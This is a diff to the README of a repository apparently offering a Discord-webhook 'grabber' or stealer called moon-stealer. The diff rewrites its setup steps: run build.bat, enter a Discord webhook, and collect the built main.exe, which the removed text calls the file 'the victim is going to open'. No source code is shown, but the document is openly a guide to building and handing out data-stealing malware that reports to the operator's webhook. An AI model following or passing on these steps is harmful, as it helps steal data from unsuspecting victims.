dannythehacker/moon-stealer/README.md

 ### Setup

 1. Download moon grabber
 2. Run build.bat

-3. If you have python installed type y and press enter but if you don't have python press n to install.
+3. if you have python installed, press y else press n

-4. For people who pressed y: Enter your discord webhook.
+4. enter your webhook

-5. For people who pressed n: Rerun build.bat (if you pressed n and installed python) and this time press y and enter your discord webhook.
+5. it will build the logger for you. when the terminal closes, check the moon grabber folder for a folder called dist.

-6. Go to the moon-grabber folder and you will find another folder called "dist", open it and you will see "main.exe" that is your grabber the victim is going to open.
+6. open and find your main.exe

 Enjoy!